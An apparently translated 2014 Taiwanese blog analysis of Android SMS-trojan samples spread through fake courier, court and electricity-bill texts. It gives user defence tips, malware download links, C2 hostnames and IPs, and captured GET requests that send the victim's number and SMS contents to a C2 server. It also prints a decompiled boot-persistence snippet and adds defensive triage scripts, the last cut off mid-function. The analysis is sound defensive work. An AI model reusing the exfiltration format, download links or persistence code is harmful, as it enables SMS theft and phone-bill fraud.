Sunday, May 18, 2014

Android SMS virus:

Step 1. Open Settings, choose Security, then untick Unknown sources (allow installation of non-Market apps), as shown below:
After this change only apps from Google Play can be installed. Even if you tap the goo.gl link in the SMS, download the courier-notice 憑證.apk, accidentally tap the downloaded apk file, and then accidentally tap the package installer as well, the phone blocks the installation with an "Install blocked" message, as shown below:
Conversely, if you do want to install a downloaded apk file, you must tick Unknown sources first; otherwise it cannot be installed.
Note that this setting only prevents new sideloads. An app that is already installed stays installed and must be removed by hand, and if it has made itself a device administrator (as one of the samples below does via its DEVICE_ADMIN_ENABLED receiver) it must first be deactivated under Settings > Security > Device administrators before Android will let you uninstall it.

Cancel the carrier "micro-payment" (小額付費, direct carrier billing) service

For most people this micro-payment service seems to serve no purpose...
So call your carrier's customer service and have it stopped! Even if you are not infected, you should stop it anyway...
The reason it matters here: a trojan that can receive and send SMS from your phone can complete carrier-billed purchases that are confirmed by an SMS code, and the charge lands on your phone bill.
  • Chunghwa Telecom (中華電信): dial 800 from your mobile, or the 0800080090 customer service line
  • Taiwan Mobile (台灣大哥大): dial 188 from your mobile (toll-free) or 02-66062999
  • FarEasTone (遠傳電信): dial 888/123 from your mobile, or 449-5888/449-5123 from a landline
Android SMS virus sender number: 0912104628
Android SMS virus URL: http://goo.gl/4zjSLG
Android SMS virus message: 您的法院訴訟 ("Your court lawsuit")

Android SMS virus URL: https://www.dropbox.com/s/l0lqzrtzqh2d6qd/%E9%80%9A%E7%9F%A5%E5%96%AE.apk (通知單.apk, "notice form")


Android SMS virus sender number: 0955164020

Android SMS virus message: 您的民事賠償 ("Your civil compensation")
Android SMS virus URL: http://goo.gl/9Ofdu2
Android SMS virus URL: https://www.dropbox.com/s/09g745brshb6m73/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
File: 通知單.apk ("notice form")
Traffic analysis (short-URL click statistics): http://goo.gl/#analytics/goo.gl/9Ofdu2/all_time


- Broadcast Receivers
com.example.google.service.MyDeviceAdminReceiver
intent-filter action:android.app.action.DEVICE_ADMIN_ENABLED
com.example.google.service.SMSServiceBootReceiver
intent-filter action:android.intent.action.BOOT_COMPLETED
com.example.google.service.SMSReceiver
intent-filter action:android.provider.Telephony.SMS_RECEIVED
TaskRequest

- Required Permissions
android.permission.READ_PHONE_STATE
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.RECEIVE_SMS
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.RECEIVE_BOOT_COMPLETED


- Used Permissions
android.permission.SEND_SMS
method call: "Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call: "Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
method call: "Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call: "Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
android.permission.READ_PHONE_STATE
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls "Landroid/telephony/TelephonyManager/getLine1Number()Ljava/lang/String;"
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls "Landroid/telephony/TelephonyManager/getDeviceId()Ljava/lang/String;"
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls "Landroid/telephony/TelephonyManager/getSimSerialNumber()Ljava/lang/String;"
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls "Landroid/telephony/TelephonyManager/getSubscriberId()Ljava/lang/String;"
(getLine1Number, getDeviceId, getSimSerialNumber and getSubscriberId are the MSISDN, IMEI, ICCID and IMSI respectively: a complete phone-plus-SIM fingerprint, not just "the phone number")
android.permission.VIBRATE
method call: "Landroid/support/v4/app/NotificationCompat$Builder/setDefaults(I)Landroid/support/v4/app/NotificationCompat$Builder;" calls "Landroid/app/Notification/Idefaults"
method call: "Landroid/support/v4/app/NotificationCompatHoneycomb/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap;)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call: "Landroid/support/v4/app/NotificationCompatIceCreamSandwich/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call: "Landroid/support/v4/app/NotificationCompatJellybean/(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z Z I Ljava/lang/CharSequence;)V" calls "Landroid/app/Notification/Idefaults"
(the VIBRATE and ACCESS_NETWORK_STATE hits are in the bundled android.support.v4 library, not in the malware's own classes)
android.permission.ACCESS_NETWORK_STATE
method call: "Landroid/support/v4/net/ConnectivityManagerCompat/getNetworkInfoFromBroadcast(Landroid/net/ConnectivityManager; Landroid/content/Intent;)Landroid/net/NetworkInfo;" calls "Landroid/net/ConnectivityManager/getNetworkInfo(I)Landroid/net/NetworkInfo;"
method call: "Landroid/support/v4/net/ConnectivityManagerCompatGingerbread/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls "Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call: "Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls "Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call: "Landroid/support/v4/net/ConnectivityManagerCompat$BaseConnectivityManagerCompatImpl/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls "Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
android.permission.CHANGE_COMPONENT_ENABLED_STATE
method call: "Lcom/example/google/service/MainActivity/HideIcon()V" calls "Landroid/content/pm/PackageManager/setComponentEnabledSetting(Landroid/content/ComponentName; I I)V"
(HideIcon() calling setComponentEnabledSetting on its own launcher activity is the standard trick for making the app's icon disappear from the app drawer after the first launch)
android.permission.WAKE_LOCK
method call: "Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager/newWakeLock(I Ljava/lang/String;)Landroid/os/PowerManager$WakeLock;"
method call: "Landroid/support/v4/content/WakefulBroadcastReceiver/completeWakefulIntent(Landroid/content/Intent;)Z" calls "Landroid/os/PowerManager$WakeLock/release()V"
method call: "Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager$WakeLock/acquire(J)V"
android.permission.READ_CONTACTS
method call: "Lcom/example/google/service/ContactsHelper/getPhoneContactNumbers()V" calls "Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
method call: "Lcom/example/google/service/ContactsHelper/getPhoneContacts()V" calls "Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
android.permission.INTERNET
method call: "Lcom/example/google/service/HttpHelper/callWS(Ljava/lang/String;)Ljava/lang/String;" calls "Lorg/apache/http/impl/client/DefaultHttpClient/()V"

- Used Features
android.hardware.telephony
android.hardware.touchscreen
net:
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1
Host: 141.105.65.113
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 Jun 2014 15:38:16 GMT

(the same t=new request and empty 200 response were captured repeatedly: four requests, two responses)

leak:
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1
Host: 141.105.65.113
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069070000 HTTP/1.1
Host: 141.105.65.113
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1
Host: 141.105.65.113
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069108000 HTTP/1.1
Host: 141.105.65.113
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Here p=15555215554 is the Android emulator's default line number, and the t=r requests carry a test SMS delivered to the emulator (sender a=0815123456789, body m=Hello World!, d = delivery time in epoch milliseconds; 1402069070000 is 2014-06-06 15:37:50 UTC, which matches the server's Date header above). On a real phone it is the victim's own number and every received SMS that leave this way, in clear text over plain HTTP GET.

dns:
muc03s07-in-f14.1e100.net (Google infrastructure; 1e100.net is Google's own reverse-DNS domain)

http:
Request: GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic;10
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new

tcp:
173.194.44.14:443 (Google; the emulator's background traffic, not the C2)

Android SMS virus sender number: 0926566920
Android SMS virus message: 宅急便 快遞 ("Takkyubin courier delivery")
Android SMS virus URL: http://goo.gl/6yOcoV (could not download)
Android SMS virus URL: https://www.dropbox.com/s/9llco6cqo0rxyup/%E6%86%91%E8%AD%89.apk?m=
wget output: 2014-06-02 19:07:04 ERROR 509: Bandwidth Error.
Traffic analysis: http://goo.gl/#analytics/goo.gl/6yOcoV/all_time

Android SMS virus sender number: 0933398720
Android SMS virus message: 宅急便 快遞 ("Takkyubin courier delivery")
Android SMS virus URL: http://goo.gl/6fs5jx (analyzed)
Android SMS virus URL: https://www.dropbox.com/s/rr5xv3qsn7815u0/%E9%9B%BB%E5%AD%90%E8%A1%A8%E5%96%AE.apk?m=
File: 電子表單.apk ("electronic form")
Traffic analysis: http://goo.gl/#analytics/goo.gl/6fs5jx/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
(libAPKProtect.so is the runtime stub of the APKProtect packer: the real dex is decrypted in memory, so a plain dex2jar run on this variant only yields the loader, and dynamic analysis is what gives the indicators below)
dns:
Name / Query type / Result / Successful / Protocol
ybbcel888.vicp.cc DNS_TYPE_A 220.136.223.64 udp
ybbcel999.eicp.net DNS_TYPE_A 220.136.213.43 udp
tcp: 220.136.223.64:9090
(vicp.cc and eicp.net are dynamic-DNS domains; the A records differ between the samples below and point at Taiwanese consumer (HiNet) address ranges, so the C2 is most likely a home machine behind DDNS rather than a hosted server, and the hostnames are the stable indicator, not the IPs)

Antivirus detections (engine, detection name, signature date):
Ad-Aware  Android.Trojan.SMSSend.ND  20140602
AegisLab  SUSPICIOUS  20140602
AhnLab-V3  Android-Malicious/Litch  20140602
AntiVir  Android/SmsAgent.EB.Gen  20140602
Avast  Android:RuSMS-AH [Trj]  20140602
BitDefender  Android.Trojan.SMSSend.ND  20140602
DrWeb  Android.SmsBot.72.origin  20140602
ESET-NOD32  a variant of Android/TrojanSMS.Agent.ADD  20140602
Emsisoft  Android.Trojan.SMSSend.ND (B)  20140602
F-Secure  Trojan:Android/SmsSend.IE  20140601
GData  Android.Trojan.SMSSend.ND  20140602
Kaspersky  HEUR:Trojan-Spy.AndroidOS.SmForw.al  20140602
MicroWorld-eScan  Android.Trojan.SMSSend.ND  20140602
Sophos  Andr/SMSSend-EC

Android SMS virus sender number: 0961267359
Android SMS virus message: 宅急便 快遞 ("Takkyubin courier delivery")
Android SMS virus URL: http://goo.gl/58ooGF (could not download)
Android SMS virus URL: https://www.dropbox.com/s/iweqcsh4vp9g5f3/%E6%86%91%E8%AD%89.apk?m=
File: 憑證.apk ("certificate")
Traffic analysis: http://goo.gl/#analytics/goo.gl/58ooGF/all_time

Dropbox returned:
Error (509)

This account's public links are generating too much traffic and have been temporarily disabled!

Android SMS virus message: 黑貓宅急便 ("Black Cat Takkyubin", the T-Cat courier brand)
Android SMS virus URL: http://goo.gl/em7bab (analyzed)
Content-Type: [application/vnd.android.package-archive]
Android SMS virus URL: https://www.dropbox.com/s/plym2gpyohf9n7a/%E6%86%91%E8%AD%89.apk?m=
Traffic analysis: http://goo.gl/#analytics/goo.gl/em7bab/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
Name / Query type / Result / Successful / Protocol
ybbcel999.eicp.net DNS_TYPE_A 61.228.130.24 udp
ybbcel888.vicp.cc DNS_TYPE_A 220.136.213.160 udp

Android SMS virus message: 黑貓宅急便(2) ("Black Cat Takkyubin", second variant)
Android SMS virus URL: http://goo.gl/SOkMHW (analyzed)
Android SMS virus URL: https://www.dropbox.com/s/zv1f6h6rezcuttt/%E6%86%91%E8%AD%89.apk
Traffic analysis: http://goo.gl/#analytics/goo.gl/SOkMHW/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
Name / Query type / Result / Successful / Protocol
buyaoa1.vicp.co DNS_TYPE_A 111.249.169.13 udp
yemian3.vicp.co DNS_TYPE_A 220.136.220.151 udp
tcp: 111.249.169.13:9090

Android SMS virus message: 張瑞芬您申請網上支付電費 ("張瑞芬, you applied to pay your electricity bill online")
Android SMS virus URL: http://goo.gl/k0jo8D (analyzed)
Content-Type: [application/vnd.android.package-archive]
Traffic analysis: http://goo.gl/#analytics/goo.gl/k0jo8D/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
Name / Query type / Result / Successful / Protocol
ybbcel999.eicp.net DNS_TYPE_A 61.228.130.220 udp
ybbcel888.vicp.cc DNS_TYPE_A 61.228.131.215 udp

Android SMS virus message: 您的快遞簽收通知單 ("Your courier delivery-receipt notice")
Android SMS virus URL: http://goo.gl/1MN94O (analyzed)
Android SMS virus URL: https://www.dropbox.com/s/62556lg017ht0du/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
Traffic analysis: http://goo.gl/#analytics/goo.gl/1MN94O/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/msc.switchlib.act/lib/libbsvsv.so 0x40516898
Trying to load lib /data/data/msc.switchlib.act/lib/libbsomd.so 0x40516898
(a different package name and different native libraries from the google.service samples above, so this is a different build, possibly a different family)
dns:
Name / Query type / Result / Successful / Protocol
xdynfa.vicp.co DNS_TYPE_A 211.20.68.250
boyiis.iego.cn DNS_TYPE_A 114.25.31.243
android.clients.google.com DNS_TYPE_A 173.194.116.162 173.194.116.163 173.194.116.164 173.194.116.165 173.194.116.166 173.194.116.167 173.194.116.168 173.194.116.169 173.194.116.174 173.194.116.160 173.194.116.161 (Google; emulator background traffic)
162.116.194.173.in-addr.arpa DNS_TYPE_PTR

service:
Timestamp  Service name
(msc.switchlib.act.BaseService is the sample's own service; the remaining entries are stock emulator system services)
3.232  com.android.vending.util.WorkService
3.232  com.android.vending.util.WorkService
11.234  msc.switchlib.act.BaseService
22.241  com.android.music.MediaPlaybackService
23.236  com.android.music.MediaPlaybackService
23.237  com.android.music.MediaPlaybackService
24.241  com.android.music.MediaPlaybackService
24.242  com.android.music.MediaPlaybackService
25.237  com.android.music.MediaPlaybackService
30.232  com.android.music.MediaPlaybackService
31.237  com.android.music.MediaPlaybackService
60.249  com.android.music.MediaPlaybackService
60.249  com.android.music.MediaPlaybackService
72.252  msc.switchlib.act.BaseService
78.253  msc.switchlib.act.BaseService
162.486  com.android.mms.transaction.SmsReceiverService
162.487  com.android.mms.transaction.SmsReceiverService
167.490  msc.switchlib.act.BaseService
179.985  msc.switchlib.act.BaseService
179.986  msc.switchlib.act.BaseService
179.986  com.android.email.service.EmailBroadcastProcessorService
179.986  com.android.email.service.EmailBroadcastProcessorService
179.986  com.google.android.gsf.checkin.CheckinService
179.986  com.google.android.gsf.checkin.CheckinService
179.986  com.android.exchange.SyncManager
180.991  com.google.android.gsf.update.SystemUpdateService
180.991  com.google.android.gsf.update.SystemUpdateService
180.991  com.google.android.partnersetup.AppHiderService
180.992  com.google.android.partnersetup.AppHiderService
180.992  com.android.providers.downloads.DownloadService
180.992  com.android.providers.downloads.DownloadService
181.986  com.android.mms.transaction.SmsReceiverService
181.986  com.android.mms.transaction.SmsReceiverService
181.986  com.android.providers.media.MediaScannerService
181.986  com.android.providers.media.MediaScannerService
181.986  com.android.vending.util.AlarmService
181.986  com.android.vending.util.AlarmService
182.991  com.android.providers.calendar.EmptyService
182.991  com.android.bluetooth.opp.BluetoothOppService
182.991  com.android.bluetooth.opp.BluetoothOppService
182.991  com.google.android.gm.MailIntentService
182.992  com.google.android.gm.MailIntentService
182.992  com.google.android.gm.downloadprovider.DownloadService
182.992  com.google.android.gm.downloadprovider.DownloadService
187.998  com.google.android.gsf.checkin.CheckinService
187.998  com.google.android.gsf.checkin.CheckinService
187.998  com.google.android.gsf.update.SystemUpdateService
187.998  com.google.android.gsf.update.SystemUpdateService
189.998  com.google.android.partnersetup.AppHiderService
189.999  com.google.android.partnersetup.AppHiderService
197.993  com.google.android.gsf.checkin.CheckinService
197.993  com.google.android.gsf.checkin.CheckinService
197.993  com.google.android.gsf.checkin.EventLogService
197.993  com.google.android.gsf.checkin.EventLogService
197.993  com.android.providers.calendar.EmptyService
197.993  com.google.android.gsf.checkin.EventLogService
197.994  com.google.android.gsf.checkin.EventLogService
207.413  com.google.android.gsf.checkin.CheckinService
207.413  com.google.android.gsf.checkin.CheckinService
207.413  com.google.android.gsf.update.SystemUpdateService
207.413  com.google.android.gsf.update.SystemUpdateService
209.412  com.google.android.partnersetup.AppHiderService
209.412  com.google.android.partnersetup.AppHiderService

Android SMS virus message: 宅急便快遞通知 ("Takkyubin courier notice")
Android SMS virus URL: wget http://goo.gl/6U6J3B (could not download)
Android SMS virus URL: https://www.dropbox.com/s/g4c8e9zp8dqqhk5/%E6%86%91%E8%AD%89.apk?m=
ERROR 509: Bandwidth Error.
Traffic analysis: http://goo.gl/#analytics/goo.gl/6U6J3B/all_time

Android SMS virus message: 瑞芬找到你了 ("Ruifen found you")
Android SMS virus URL: wget http://goo.gl/976Zaj (could not download)
Android SMS virus URL: http://211.44.3.186/11/index.php
Traffic analysis: http://goo.gl/#analytics/goo.gl/976Zaj/all_time

When the link is opened from a PC, the server detects a desktop client and redirects to a news page;
when it is opened from a phone, it serves the apk download. (It is most likely keying on the User-Agent header, so fetching the page from a desktop with an Android browser User-Agent string should reproduce the apk response.)

Now a look at the IP it is registered to:
211.44.3.186
A whois lookup shows
it is registered to the Korea Network Information Center (KRNIC).

Obviously no courier company would be using a Korean IP.

Android SMS virus message: 您正在申請網上支付電費 ("You are applying to pay your electricity bill online")
Android SMS virus URL: wget http://goo.gl/UB9zBa (could not download)
Android SMS virus URL: http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
File: 通知單.apk ("notice form")
Traffic analysis: http://goo.gl/#analytics/goo.gl/UB9zBa/all_time

Scam SMS text: 您正在申請網上支付103年2月電費共計367元, 若非本人操作, 請查看電子憑證進行取消 http://goo.gl/UB9zBa ("You are applying to pay your February 2014 (ROC year 103) electricity bill of NT$367 online. If this was not you, check the electronic certificate to cancel: http://goo.gl/UB9zBa")

Tapping the link fetches the apk from http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk; if you open it and install, the following appears:

Security analysis:

1. This malicious apk can read the phone's contacts (friends' names and numbers) and SMS messages, and uploads the user's phone number to the IP 203.69.59.153:
[GET] http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=[TelNum]
2. A whois lookup on the IP (http://www.whois365.com/tw/ip/203.69.59.153)
shows it belongs to Chunghwa Telecom; possibly a customer's leased server that was compromised?
3. The attacker's activity clusters on the following dates: 3/26: 1,706 hits; 3/31: 2,946; 4/3: 3,873; 4/7: 4,869. Over 31,000 in total so far. (These figures come from the short-URL click statistics; cautious users who did not click are not counted, so the real number of targets is higher.) As of this writing, the web service on the compromised IP is still up.
  
The SMS virus has been all the rage lately; many friends have received these messages, and my own Android phone has received several too.
Since I have been working with Android for quite a while, this is a good chance to apply that background and see what the virus actually does.
Android APK packages are notoriously easy to decompile; a few years ago the very capable dex2jar decompiler appeared, and paired with JD-GUI it makes the decompiled source easy to read. Anyone interested can try it.

If you want to know how to decompile, follow these steps:

1.
Install dex2jar and JD-GUI
2.
On the command line run
        $> dex2jar.sh apkfile

   
This produces a file named apkfile_dex2jar.jar in the same folder
3.
Open that file in JD-GUI and you can read the source

-----
Below is a summary of the implementation details of this SMS virus.
The virus requests the following permissions:

    android.permission.READ_PHONE_STATE
    android.permission.SEND_SMS
    android.permission.READ_SMS
    android.permission.WRITE_SMS
    android.permission.RECEIVE_SMS
    android.permission.INTERNET
    android.permission.CALL_PHONE
    android.permission.READ_CONTACTS
    android.permission.WRITE_EXTERNAL_STORAGE
    com.android.launcher.action.INSTALL_SHORTCUT

These permissions all relate to SMS and contact data, consistent with the virus behaviour we know about. (CALL_PHONE fits the call-forwarding behaviour described further down, and INSTALL_SHORTCUT lets it drop a launcher shortcut.)

From AndroidManifest.xml we can see it has three key components:
        <service android:name=".SMSServices">
            <intent-filter>
                <action android:name="com.example.android.services.SMSServices" />
            </intent-filter>
        </service>

        <receiver android:name="SMSServiceBootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <receiver android:name="SMSSender" />

Every time the phone boots, SMSServiceBootReceiver receives the broadcast, and all it does is start SMSService, so rebooting the phone does not stop the virus.
public class SMSServiceBootReceiver extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Intent localIntent = new Intent();
    localIntent.setAction("com.example.android.services.SMSServices");
    paramContext.startService(localIntent);
  }
}
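As an added example (not code from the post or from the malware), here is a small triage script for the decoded AndroidManifest.xml that apktool produces. It lists the declared permissions and the broadcast receivers with their intent actions, then flags the combinations discussed on this page: SMS receive plus send, contacts plus send, a BOOT_COMPLETED receiver, an SMS_RECEIVED receiver and a device-admin receiver. The embedded manifest is constructed from the components shown above; its package name com.example.android.services is assumed from the service's action string, and the rule set and its labels are this example's own, not a published scoring scheme.

```python
"""Triage a decoded AndroidManifest.xml for the SMS-trojan traits described above.

Added example, not code from the post or from the malware. Input is the
plain-text manifest that apktool writes (the binary manifest inside the APK
must be decoded first; ET cannot read the binary AXML form directly).
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS

# (label, permissions that must all be declared, receiver actions that must all be present).
# Rules and wording are this example's own, derived from the behaviour described in the post.
RULES = [
    ("can intercept and send SMS",
     {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"}, set()),
    ("can harvest contacts and text them",
     {"android.permission.READ_CONTACTS", "android.permission.SEND_SMS"}, set()),
    ("restarts itself after reboot",
     set(), {"android.intent.action.BOOT_COMPLETED"}),
    ("hooks incoming SMS delivery",
     set(), {"android.provider.Telephony.SMS_RECEIVED"}),
    ("registers as device administrator (resists uninstall)",
     set(), {"android.app.action.DEVICE_ADMIN_ENABLED"}),
]


def parse_manifest(xml_text):
    """Return package name, declared permissions and a receiver -> actions map."""
    root = ET.fromstring(xml_text)
    permissions = {e.get(NAME) for e in root.iter("uses-permission")}
    receivers = {}
    for rcv in root.iter("receiver"):
        # Actions nested anywhere under the receiver's intent-filters.
        receivers[rcv.get(NAME)] = {a.get(NAME) for a in rcv.iter("action")}
    return {"package": root.get("package"),
            "permissions": permissions,
            "receivers": receivers}


def triage(manifest):
    """Return the labels of every rule the manifest satisfies."""
    actions = set().union(*manifest["receivers"].values())
    return [label for label, perms, acts in RULES
            if perms <= manifest["permissions"] and acts <= actions]


# Constructed manifest mirroring the permissions and the three components shown above.
# The package name is an assumption taken from the service's action string.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.android.services">
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <application android:label="通知單">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <service android:name=".SMSServices">
            <intent-filter>
                <action android:name="com.example.android.services.SMSServices" />
            </intent-filter>
        </service>
        <receiver android:name="SMSServiceBootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:name="SMSSender" />
    </application>
</manifest>
"""

if __name__ == "__main__":
    m = parse_manifest(SAMPLE_MANIFEST)
    print("package:", m["package"])
    for name, acts in sorted(m["receivers"].items()):
        print("receiver", name, sorted(acts))
    for finding in triage(m):
        print("FLAG:", finding)
```

Run it against the output of `apktool d sample.apk` by reading AndroidManifest.xml from the decoded directory into parse_manifest(); for the packed variants above the manifest is still readable even though the dex is not.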

The virus's default launcher component is MainActivity. On start it checks whether the APK is running in an emulator, apparently to avoid having its behaviour exercised in a sandbox; it may also be tied to its server.

As mentioned, SMSService runs as soon as the phone boots; it is also started whenever the app itself is run. Essentially it makes sure SMSService is always running.

SMSService starts SMSObserver and SMSSender; let's look at each of these next.

SMSObserver
looks through every unread message in your SMS inbox, extracts the content of the messages you received, and finally sends them to the remote server. The upload contains the following:

·                     your own phone number
·                     the sender's phone number
·                     the message body
·                     the time the message was sent
The remote server looks like a Microsoft-IIS/7.0 machine, apparently running a web service written in ASP.NET. Below is the format it sends to the server, using a GET request. Essentially all subsequent behaviour is reported to this server, and the server returns content for the client to use, but when I tried sending a few requests with Postman I got nothing back; the server may block API abuse, or my HTTP request format may still have been wrong.

        http://101.55.13.43/sms/SMSHandler.ashx?t=r&p=<your phone number>&a=<friend's phone number>&m=<message body>&d=<send time>

Requests like this going out are truly frightening: the remote server presumably records all of it, can resell the personal data, reuse it as material for future SMS campaigns, and even refine its social engineering. Over the Internet everything moves fast, and through a connected device, given an opening, private data can be stolen with ease. Terrifying.
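The following is an added example, not part of the original post, that decodes these requests from a proxy log so an analyst can see exactly what left the phone. The log line format, the client IP and the Google line are constructed for the example; the C2 URLs are the ones captured in the sandbox traffic earlier on this page plus the t=s request from the 203.69.59.153 sample, and the command meanings are only what this post's own analysis supports.

```python
"""Decode and flag the SMS-trojan C2 requests described on this page.

Added example (not from the original post). It parses proxy-log lines in a
simple constructed format and decodes the query string of any request to a
``SMSHandler*.ashx`` endpoint, the C2 URL pattern observed in every sample.
"""
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qs

# Endpoint pattern observed in both the 141.105.65.113 and 203.69.59.153 samples.
C2_PATH = re.compile(r"/SMSHandler\d*\.ashx$", re.IGNORECASE)

# Command codes seen on the page; the meanings are limited to what the post shows.
COMMANDS = {
    "new": "check-in / poll for a new task",
    "request": "poll with template selector (m=generic;10 observed)",
    "r": "forward a received SMS (p=victim, a=sender, m=body, d=epoch ms)",
    "s": "report the victim's phone number (p=victim)",
}


def decode_c2_request(url):
    """Return a dict describing the C2 request, or None if url is not one."""
    parts = urlsplit(url)
    if not C2_PATH.search(parts.path):
        return None
    q = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    cmd = q.get("t", "")
    info = {
        "host": parts.hostname,
        "path": parts.path,
        "command": cmd,
        "meaning": COMMANDS.get(cmd, "unknown command"),
        "victim_number": q.get("p"),
        "sms_sender": q.get("a"),
        "sms_body": q.get("m"),      # parse_qs already URL-decodes %20 etc.
        "sms_time": None,
    }
    if q.get("d", "").isdigit():
        # d is epoch milliseconds; render it as UTC so it can be matched to server Date headers.
        info["sms_time"] = datetime.fromtimestamp(int(q["d"]) / 1000, tz=timezone.utc).isoformat()
    return info


def scan_proxy_log(lines):
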